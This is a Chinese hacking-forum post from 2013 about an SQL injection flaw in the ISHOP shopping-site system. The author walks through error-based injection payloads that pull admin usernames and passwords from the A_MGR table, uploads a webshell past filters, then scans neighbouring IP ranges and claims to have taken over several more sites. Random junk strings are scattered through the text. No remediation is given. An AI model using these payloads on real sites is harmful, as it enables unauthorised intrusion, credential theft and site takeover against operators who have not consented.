找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1981|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点8 O  w2 ^/ {, q9 X, W3 q
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389$ c9 z, J5 m5 ~; e8 f0 D0 g

$ y/ D" i2 F, t) _7 R8 z习惯性的加’having1=1--1 T- T; f4 x* ~) A4 [

% T3 g. P& [; d) xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—. q/ |7 ?1 z7 v
% Z7 X, f6 s- m/ T) q% k
0: g/ Z" g5 R2 i9 R$ M7 J8 A! |
0 q2 `1 _$ Z) s$ n: }2 v& D
爆出Diary_A.dl_Title(这时候很激动啊)
9 m( ~( N- x5 n$ b( k8 G( p, e  f$ U) F; B5 v7 e: _* q! H! ~
那么继续
9 _- a; r8 w; D& @http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
1 c9 q. J1 ]8 `! l# T  ~8 d. s3 g9 ?9 i! d
继续,一直爆下去- ?2 R5 q' p# {7 c

% u4 Q3 _# S* I' |4 e爆到几个字段和表段 但是没找到需要的管理用户的字段
- B% I6 d, c) n& ~9 ]: l. N7 D. }" ^
蛋疼了 怎么办 然后去后台登陆页看源码& S$ `( S) [, f$ M: X
0 u/ O0 s$ y. T9 d6 Y; [8 U
0
0 x) ?! f# T( L; z/ Z4 z
0 H( M! [- L# I" C9 zInput name= “ADUID”( w4 n: t+ s; u8 K" r  D
Input name= “ADPWD”
1 y! X3 r2 I% n* s+ e" {6 {  z7 b% R
" @& \9 m& U( E3 h很幸运 找到了字段那就继续: v4 N9 _- ?2 M
找到之后开始爆用户
+ W8 `1 D& G: k4 xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—4 x4 s- y- v8 |2 l* @( O  Z
爆密码9 X0 L& s. I, q6 [4 U) l: q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
, Q9 s5 Z7 `3 N$ i% U* s测试了下 这个注入点只能爆到文章哪里的表 5 C% d% Q1 G8 P# \# Y: C' u

$ T2 E. `8 I! W$ {8 U& m$ g头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
; z0 Q. ^) O5 s" q2 @
9 z8 d# B3 F3 ]9 w$ N又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了  W: J3 h; u1 i0 R% q) q# E
9 `5 j/ o" k7 y$ Z4 w! ?
473
; k, _6 `' y# g# o
# V4 N3 V8 F. X进后台
- C* z* B& M/ \4 P- _6 d8 q! L# Y' u9 N$ X/ P
& L$ }" R% P9 v. e; f7 ]
发现几个上传点 有的地方不能上传 而且防止恶意代码/ G/ q! O9 a, b. L# r
" n% g9 s! ^/ t# S- X8 q% p
没办法 各种百度各种找大牛 找到一只好像可以突破的马2 Z; h9 [5 r3 p1 _

3 h2 ?  j+ \! l6 `* P! Z0 W) c3 f+ ]' B( _2 G
在系统管理那里直接上传 不过没有显示地址
2 r, h; @( e, h5 A' x8 O
1 w4 I2 u! f  x. N& ]再上传一次 抓包 搞定OK
. [4 C' p' S7 ^/ H$ m! E  l" U% V- o* m- @( X+ j" {

: q5 d! t4 y6 f! f
/ K& a# N, ?- M472
% u* x8 B8 s+ N0 Y6 ]; B* G# C. O* p3 d( J) W" l: x
晚上不行了 去睡觉。。。
0 U. I& ^0 G+ P$ w第二天刚起床 闲的没事做继续日站吧 & |8 ~7 i! R# F6 q/ p! z  j( Y

" q# V6 v8 G! G: ?4 l找个站 就把这个站的旁c扫了下
3 _& V: G& p* h6 s1 s) I2 q0 t4 b' Z# w" @2 m) R5 \
发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 {1 o: b. Z! G' B3 z8 B, Z- M  x2 G) u2 R$ {4 g
就找到会员登录口测试/ S  S. I" p& V
! d, i# Y! r) j! o" E$ n
'and (select top 1 MGR_UID from A_MGR)>0—
. I/ e- l; Q' ~  m, ?果断爆到了 这时候我很激动 通杀
7 {! c  B: y/ D& ^) P/ V0 J$ C* |' V/ p$ Y
再次翻c段- a9 K  A6 e1 g0 L
* q" i0 ~9 r' y" p% L/ z
翻出几个站 都成功拿下
; _( n# \6 N+ C) ^
- O' x" C& f' J# ^+ S4 _5 t
3 g2 ]% H) ~$ o0 q" u0 _
8 A: M/ Z* M. {修复方案:. l6 i, |! G4 s+ B
他们比我专业
; U+ S9 I$ }' g, l& j4 F4 u. O$ @* A! }4 H  e
5 Q' P8 u: i8 A# m; B0 w% l8 Z5 Z

" b; v0 @! U+ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表